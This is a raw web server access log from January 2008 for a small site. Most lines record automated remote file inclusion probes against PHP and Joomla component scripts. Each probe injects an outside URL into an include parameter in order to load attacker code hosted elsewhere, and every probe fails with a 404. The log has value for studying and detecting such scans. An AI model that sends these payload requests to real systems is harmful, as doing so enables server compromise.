141.30.61.152 - - [06/Jan/2008:14:03:20 -0800] "GET /logs/access_071221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:04:54 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:04:55 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:04:55 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:14:06:14 -0800] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:14:06:15 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:14:06:15 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [06/Jan/2008:14:06:30 -0800] "GET /logs/access_071212.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:10:49 -0800] "GET /logs/access_071205.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:11:48 -0800] "GET /logs/access_071229.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:14:12:05 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:14:12:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:14:12:06 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.222.110.249 - - [06/Jan/2008:14:14:28 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.48.206 - - [06/Jan/2008:14:17:29 -0800] "GET //skin/zero_vote/error.php?dir=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.19.68 - - [06/Jan/2008:14:17:54 -0800] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/spyd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
70.85.19.68 - - [06/Jan/2008:14:17:54 -0800] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://h1.ripway.com/spyd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:19:21 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:19:21 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:19:22 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:14:19:50 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:14:21:08 -0800] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:14:21:09 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:14:21:09 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:14:21:22 -0800] "GET /logs/access_071212.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:21:25 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:21:25 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:21:26 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:21:26 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:21:26 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:21:26 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:22:11 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.180.175.37 - - [06/Jan/2008:14:22:11 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:23:44 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:23:44 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:23:45 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:23:55 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:23:55 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:23:55 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.7.77 - - [06/Jan/2008:14:24:23 -0800] "GET /minamijewelry/source_images/updated1/?M=A HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:24:29 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.134.160.114 - - [06/Jan/2008:14:24:43 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://libra03.com/ifactor-old/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:24:43 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:24:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:24:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.53.227.2 - - [06/Jan/2008:14:25:40 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.53.227.2 - - [06/Jan/2008:14:26:01 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pkumexico.com/components/com_joomlaxplorer/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.48.206 - - [06/Jan/2008:14:27:10 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [06/Jan/2008:14:27:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.48.206 - - [06/Jan/2008:14:28:35 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.talomark.com/iloinenpuutarha/.tmp/icon.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:14:29:25 -0800] "GET /index.php?option=com_gigcal&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.148.27 - - [06/Jan/2008:14:29:26 -0800] "GET /logs/index.php?option=com_gigcal&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
168.212.152.100 - - [06/Jan/2008:14:30:02 -0800] "GET /logs/access_071205.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:14:32:02 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:14:32:02 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [06/Jan/2008:14:32:03 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.132.140.60 - - [06/Jan/2008:14:32:39 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.132.140.60 - - [06/Jan/2008:14:32:44 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.132.140.60 - - [06/Jan/2008:14:32:49 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.151.232.133 - - [06/Jan/2008:14:35:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.151.232.133 - - [06/Jan/2008:14:35:06 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
91.186.4.142 - - [06/Jan/2008:14:41:44 -0800] "GET //adminfoot.php?path%5Bdocroot%5D=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.96.90.131 - - [06/Jan/2008:14:41:47 -0800] "GET //adminfoot.php?path%5Bdocroot%5D=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.90.131 - - [06/Jan/2008:14:45:19 -0800] "GET //adminfoot.php?path%5Bdocroot%5D=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:14:45:26 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:14:45:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:14:45:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.28.244.74 - - [06/Jan/2008:14:48:06 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.28.244.74 - - [06/Jan/2008:14:48:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.28.244.74 - - [06/Jan/2008:14:48:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:14:48:25 -0800] "GET /admin.php?include_path=http://waukeshasda.org/uploads/event/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.150.12 - - [06/Jan/2008:14:48:34 -0800] "GET /admin.php?include_path=http://waukeshasda.org/uploads/event/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [06/Jan/2008:14:48:35 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:14:51:13 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:14:51:13 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:14:51:14 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.96.90.131 - - [06/Jan/2008:14:52:40 -0800] "GET /logs/access_071229.log//adminfoot.php?path%5Bdocroot%5D=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.90.131 - - [06/Jan/2008:14:52:40 -0800] "GET /logs//adminfoot.php?path%5Bdocroot%5D=http://azspromservice.ru/usr/extensions/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.90.131 - - [06/Jan/2008:14:53:28 -0800] "GET /logs/access_071229.log//adminfoot.php?path%5Bdocroot%5D=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.96.90.131 - - [06/Jan/2008:14:53:28 -0800] "GET /logs//adminfoot.php?path%5Bdocroot%5D=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:54:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:54:00 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:54:01 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.4.142 - - [06/Jan/2008:14:54:50 -0800] "GET /logs/access_071229.log//adminfoot.php?path%5Bdocroot%5D=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.4.142 - - [06/Jan/2008:14:54:50 -0800] "GET /logs//adminfoot.php?path%5Bdocroot%5D=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:57:49 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:57:49 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:14:57:49 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.28.244.74 - - [06/Jan/2008:14:57:59 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [06/Jan/2008:14:59:07 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [06/Jan/2008:15:00:12 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.77.54 - - [06/Jan/2008:15:00:12 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:15:00:43 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:15:00:44 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:15:00:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:15:08:17 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.208.78.80 - - [06/Jan/2008:15:10:50 -0800] "GET //spaw_control.class.php?spaw_root=http://www.stoned.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
88.208.78.80 - - [06/Jan/2008:15:10:50 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://www.stoned.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.193.225.104 - - [06/Jan/2008:15:11:13 -0800] "GET //spaw_control.class.php?spaw_root=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.225.104 - - [06/Jan/2008:15:11:18 -0800] "GET /logs//spaw_control.class.php?spaw_root=http://lista.helloweb.eu/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.193.245.38 - - [06/Jan/2008:15:11:23 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.160.178.81 - - [06/Jan/2008:15:14:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
202.160.178.230 - - [06/Jan/2008:15:14:05 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.dmulk.com"
208.76.110.169 - - [06/Jan/2008:15:14:25 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.76.110.169 - - [06/Jan/2008:15:14:25 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
